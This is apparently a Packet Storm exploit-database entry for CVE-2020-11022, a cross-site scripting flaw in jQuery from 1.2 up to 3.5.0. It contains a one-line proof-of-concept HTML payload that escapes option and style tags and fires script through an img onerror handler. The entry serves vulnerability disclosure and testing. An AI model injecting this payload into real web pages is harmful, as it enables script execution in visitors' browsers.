Lucene search

K
packetstormCentral InfosecPACKETSTORM:162159
HistoryApr 14, 2021 - 12:00 a.m.

jQuery 1.2 Cross Site Scripting

2021-04-1400:00:00
Central Infosec
packetstormsecurity.com
4607
exploit
jquery
cross-site scripting
cve-2020-11022
proof of concept

EPSS

0.063

Percentile

93.7%

`# Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)  
# Date: 04/29/2020  
# Exploit Author: Central InfoSec  
# Version: jQuery versions greater than or equal to 1.2 and before 3.5.0  
# CVE : CVE-2020-11022  
  
# Proof of Concept 1:  
<option><style></option></select><img src=x onerror=alert(1)></style>  
  
`